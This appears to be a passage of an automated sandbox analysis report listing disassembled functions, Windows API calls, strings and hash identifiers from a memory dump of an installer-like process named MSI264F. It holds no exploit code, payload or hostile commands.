                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 443534600-4289949731
                                                                                                                        • Opcode ID: 8226966918c19c9f4450eb439f87cb9f1137d742f499f486fc0ad81f512eb844
                                                                                                                        • Instruction ID: 2010c09281bb118f6fe52808aa9aa8cbf6a7daad1cc75d66c5a9b628cba9e2be
                                                                                                                        • Opcode Fuzzy Hash: 8226966918c19c9f4450eb439f87cb9f1137d742f499f486fc0ad81f512eb844
                                                                                                                        • Instruction Fuzzy Hash: ED31E8333042049BDB249BDCD880EBEF7E9EFA0720B204A1EF651C7691C771AD4487A4
                                                                                                                        Function 00B353E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32(5E06C67B,?,00000200,00000000), ref: 00B354C6
                                                                                                                          • Part of subcall function 00AE39D0: LoadLibraryW.KERNEL32(Kernel32.dll,?,00B354DB), ref: 00AE39D8
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B354DF
                                                                                                                        • GetProcAddress.KERNEL32(?,IsWow64Process), ref: 00B354F8
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B35513
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B3552A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressCurrentErrorFreeLastLoadProcProcessVersion
                                                                                                                        • String ID: IsWow64Process
                                                                                                                        • API String ID: 3538738240-777008139
                                                                                                                        • Opcode ID: 52c455f85ee927636abfcd39eb81dfbccb62f6de634bdec370957d9eca7ec939
                                                                                                                        • Instruction ID: db2629562c1d88f6cb6567cd0f62bb3a320a5f3fdf43e5839327c8219db3b79b
                                                                                                                        • Opcode Fuzzy Hash: 52c455f85ee927636abfcd39eb81dfbccb62f6de634bdec370957d9eca7ec939
                                                                                                                        • Instruction Fuzzy Hash: 1141C2B0914B459BC760CF6AD94479AFBF9FFA4300F20895FD0AAD3660EBB465008B55
                                                                                                                        Function 00AF2C70 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2C89
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B61549
                                                                                                                          • Part of subcall function 00B61534: __CxxThrowException@8.LIBCMT ref: 00B6155E
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B6156F
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2CAA
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2CC5
                                                                                                                        • _memmove.LIBCMT ref: 00AF2D2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 443534600-4289949731
                                                                                                                        • Opcode ID: ce329658ce77e70d85bacb14336f308d550af3439c7fcb8eb3d351d912f8235b
                                                                                                                        • Instruction ID: ff739ddc4533a33b3e40db959b65caa47612a1dd277f984e7f747e60e75b8023
                                                                                                                        • Opcode Fuzzy Hash: ce329658ce77e70d85bacb14336f308d550af3439c7fcb8eb3d351d912f8235b
                                                                                                                        • Instruction Fuzzy Hash: 203184323042188FD724DF9CE880B7AF7E5ABA0721B200A6EF656CB651D7B1DC4187A1
                                                                                                                        Function 00B22F14 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 100COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000000), ref: 00B22FB6
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000001), ref: 00B22FE0
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000001), ref: 00B23053
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMove
                                                                                                                        • String ID: .dll$.old$.org
                                                                                                                        • API String ID: 3562171763-1297993771
                                                                                                                        • Opcode ID: 1c4b26c2c7d14fcb141a58fef9c2eafb90bbb20269bbf6e2e431df5461b04ac0
                                                                                                                        • Instruction ID: 3b3f93ff20c4bbf8e9c73d040a50a9d6f2b0ce840a4ad94ef95644a371dc04d6
                                                                                                                        • Opcode Fuzzy Hash: 1c4b26c2c7d14fcb141a58fef9c2eafb90bbb20269bbf6e2e431df5461b04ac0
                                                                                                                        • Instruction Fuzzy Hash: 3541B1759002198ECB20DF5CD956BA6B3F8FF88340F0584D5EE4ACB365E7749A81CB90
                                                                                                                        Function 00AF6240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00AF6276
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,InstallLocation,00000000,00000000,?,00000400), ref: 00AF629C
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,DisplayIcon,00000000,00000000,?,00000400), ref: 00AF62DA
                                                                                                                        • _wcschr.LIBCMT ref: 00AF630A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$_memset_wcschr
                                                                                                                        • String ID: DisplayIcon$InstallLocation
                                                                                                                        • API String ID: 3777521832-1034514769
                                                                                                                        • Opcode ID: 3924b29b8b4ccf0b146aebfecb3bcdde411f41f4e1223acaf0b1ede61c7b98d0
                                                                                                                        • Instruction ID: 6e3517c51804ae27443d748aea2c23a4cdb746b4fa8ce0ec8197b80ade7b77fb
                                                                                                                        • Opcode Fuzzy Hash: 3924b29b8b4ccf0b146aebfecb3bcdde411f41f4e1223acaf0b1ede61c7b98d0
                                                                                                                        • Instruction Fuzzy Hash: D13164F590021D9ADB20DB54CD52FEB73B8DF84704F044699F709AB281EBB06B49CB99
                                                                                                                        Function 00B443A1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B492EA: __mtinitlocknum.LIBCMT ref: 00B49300
                                                                                                                          • Part of subcall function 00B492EA: __amsg_exit.LIBCMT ref: 00B4930C
                                                                                                                          • Part of subcall function 00B492EA: EnterCriticalSection.KERNEL32(?,?,?,00B42AA8,0000000D,?,00B097EE,00000000,?,?), ref: 00B49314
                                                                                                                        • __mtinitlocknum.LIBCMT ref: 00B443F8
                                                                                                                        • __malloc_crt.LIBCMT ref: 00B44439
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,00B833F0,00000010,00B39517,00B82EE8,0000000C,00B39595,?,00B006CD,00000040,?,00B006CD,?,00B6DD1C), ref: 00B4445D
                                                                                                                        • _free.LIBCMT ref: 00B4446F
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00B006CD,?,00B6DD1C), ref: 00B44486
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Enter__mtinitlocknum$CountInitializeSpin__amsg_exit__malloc_crt_free
                                                                                                                        • String ID: /O
                                                                                                                        • API String ID: 2015852156-273608944
                                                                                                                        • Opcode ID: 7e939fef0b0d3b2ef04e5dba03579c14f6faa72bf40e1fa5fc304d33d7e25391
                                                                                                                        • Instruction ID: 8d0676dc71d818654700b9a33504347ef660f4e19c4c91c056ba393e29e5fec1
                                                                                                                        • Opcode Fuzzy Hash: 7e939fef0b0d3b2ef04e5dba03579c14f6faa72bf40e1fa5fc304d33d7e25391
                                                                                                                        • Instruction Fuzzy Hash: 1A31BE75500601AFC720DFA9E8D1B19BBF4FF09710B5081AAE1859B3A1CF70EA12EF40
                                                                                                                        Function 00B1ADB2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 00B1AE46
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 00B1AE67
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B1AE7C
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B1AE87
                                                                                                                        • GetDC.USER32(?), ref: 00B1AE92
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B1AE9D
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B1AEA7
                                                                                                                          • Part of subcall function 00B12030: LoadLibraryW.KERNEL32(User32.dll,00000000,00B1AE2C), ref: 00B12038
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$CapsDeviceErrorFreeLastLoadOpenReleaseVersion_memset_wcsncpy
                                                                                                                        • String ID: GetDpiForWindow
                                                                                                                        • API String ID: 498693238-4136707520
                                                                                                                        • Opcode ID: a88c2ffb2b14e137a68996bb670187c34aca28bbab67ae97a411f0e445293ce6
                                                                                                                        • Instruction ID: 6c656cd45bb02c431187e687fb9b452be76320f868753476359ec4e87e1423fa
                                                                                                                        • Opcode Fuzzy Hash: a88c2ffb2b14e137a68996bb670187c34aca28bbab67ae97a411f0e445293ce6
                                                                                                                        • Instruction Fuzzy Hash: B921C732901210AFD7228F64EC84BEEBBB8FB45B10F6445A9FC06D7291DB395D41CB91
                                                                                                                        Function 00B0C240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00B8B71C,?,00000000,5E06C67B), ref: 00B0C286
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B8B71C,?,00000000,5E06C67B), ref: 00B0C2D9
                                                                                                                        • DeleteCriticalSection.KERNEL32(?,5E06C67B), ref: 00B0C2E6
                                                                                                                        • DeleteCriticalSection.KERNEL32(00B8B71C,?,5E06C67B), ref: 00B0C305
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Delete$EnterLeave
                                                                                                                        • String ID: ..\CTL32\Refcount.cpp$p < ep
                                                                                                                        • API String ID: 3104255891-1059512116
                                                                                                                        • Opcode ID: c59c71b1aab559f233d721a59e1d5af3cc98ea037ba509878a1449e460eaac34
                                                                                                                        • Instruction ID: 0a004eeaee34824c98720beb506647aeab8e697037465bb8e777e22e04f39782
                                                                                                                        • Opcode Fuzzy Hash: c59c71b1aab559f233d721a59e1d5af3cc98ea037ba509878a1449e460eaac34
                                                                                                                        • Instruction Fuzzy Hash: A721A37A9443049FDB20AFA4DC41F5ABBF8FB84B50F1046AAE815932E1DB745C04CB65
                                                                                                                        Function 00B13390 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsicoll
                                                                                                                        • String ID: nsa$nsm$nss$nst
                                                                                                                        • API String ID: 3832890014-1059074514
                                                                                                                        • Opcode ID: a71080fe42c212e3ab4d28d5b19e82a7121ada197f79a651257eefc670531bd7
                                                                                                                        • Instruction ID: 4080091d173bf547d2d92b2e7ab69f8802a34635cfcda830862927557c1c4daf
                                                                                                                        • Opcode Fuzzy Hash: a71080fe42c212e3ab4d28d5b19e82a7121ada197f79a651257eefc670531bd7
                                                                                                                        • Instruction Fuzzy Hash: DC11E42395062556CB3122ACB8623F676E4CF05BA5FC404F1F84AD7B10F6499EC5C3A5
                                                                                                                        Function 00AF8B60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00AF8B91
                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00AF8BDB
                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00AF8C02
                                                                                                                          • Part of subcall function 00AF3D80: _memset.LIBCMT ref: 00AF3DB2
                                                                                                                          • Part of subcall function 00AF3D80: RegQueryValueExW.ADVAPI32(?,DisplayName,00000000,00000000,?,00000400), ref: 00AF3DD2
                                                                                                                          • Part of subcall function 00AF3D80: __wcsicoll.LIBCMT ref: 00AF3E1C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AF8C3F
                                                                                                                          • Part of subcall function 00AF6240: _memset.LIBCMT ref: 00AF6276
                                                                                                                          • Part of subcall function 00AF6240: RegQueryValueExW.ADVAPI32(?,InstallLocation,00000000,00000000,?,00000400), ref: 00AF629C
                                                                                                                          • Part of subcall function 00AF6240: RegQueryValueExW.ADVAPI32(?,DisplayIcon,00000000,00000000,?,00000400), ref: 00AF62DA
                                                                                                                          • Part of subcall function 00AF6240: _wcschr.LIBCMT ref: 00AF630A
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AF8C55
                                                                                                                        Strings
                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00AF8B81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen_memset$Enum__wcsicoll_wcschr
                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                        • API String ID: 1461383485-3722870514
                                                                                                                        • Opcode ID: a564e3c284ad8a23bd04846f798c2a7eecb53a89722b9e7d91ced67ce7314062
                                                                                                                        • Instruction ID: e0162b82240c84f16b2e4d45467e9b82a6a940a0fe2f0b9e1afa1fa9d5b1f4e8
                                                                                                                        • Opcode Fuzzy Hash: a564e3c284ad8a23bd04846f798c2a7eecb53a89722b9e7d91ced67ce7314062
                                                                                                                        • Instruction Fuzzy Hash: FF2165F5A4121CABDB34CB50DD44FEAB378AB84700F004599FB09B7181DE749D868BA4
                                                                                                                        Function 00B250D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79windowtimethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(?,0000000D,00000100,?,00000002,00000064,?), ref: 00B25111
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B25129
                                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 00B25145
                                                                                                                        • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?), ref: 00B2516C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B25173
                                                                                                                        Strings
                                                                                                                        • pid=%d, hwnd=%x, fn=%s, title=%s, xrefs: 00B251BC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseFullHandleImageMessageNameOpenQuerySendThreadTimeoutWindow
                                                                                                                        • String ID: pid=%d, hwnd=%x, fn=%s, title=%s
                                                                                                                        • API String ID: 3884872023-4264767816
                                                                                                                        • Opcode ID: cb744ece318cf304f882a020a5141691db40f14791661dfc3eb931ef2700138f
                                                                                                                        • Instruction ID: 9a387e268adf5782193a4e362c9a5e83229048e8437b6bfc5140ded29386ad08
                                                                                                                        • Opcode Fuzzy Hash: cb744ece318cf304f882a020a5141691db40f14791661dfc3eb931ef2700138f
                                                                                                                        • Instruction Fuzzy Hash: 672155B1900219ABEB309B54DC49FEAB3B8EB44705F0081D9E609A7190EBB45EC5CFA5
                                                                                                                        Function 00B04090 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(?), ref: 00B04099
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00B0410D
                                                                                                                        • SetCursor.USER32(00000000), ref: 00B04114
                                                                                                                          • Part of subcall function 00B03F70: IsWindow.USER32(?), ref: 00B03F7D
                                                                                                                          • Part of subcall function 00B03F70: ShellExecuteW.SHELL32(?,open,?,00000000,00B6A054,00000001), ref: 00B03FC6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CursorWindow$ExecuteLoadShell
                                                                                                                        • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                                                        • API String ID: 3131440150-763374134
                                                                                                                        • Opcode ID: cfbc0507b45e00d09897b524c28363d22b2c144fd345694c1c38eb14b2b3575e
                                                                                                                        • Instruction ID: be776fccdfd246be38ad342150f1d620ad43a378016e7410582574ab68dfc7b1
                                                                                                                        • Opcode Fuzzy Hash: cfbc0507b45e00d09897b524c28363d22b2c144fd345694c1c38eb14b2b3575e
                                                                                                                        • Instruction Fuzzy Hash: 861106B7A8121136D6203A607C06F9F3FDCDF21766F0400A1FE18A62C1EBA9A51582E6
                                                                                                                        Function 00B31067 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00B310DA
                                                                                                                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00B31108
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000004), ref: 00B31127
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
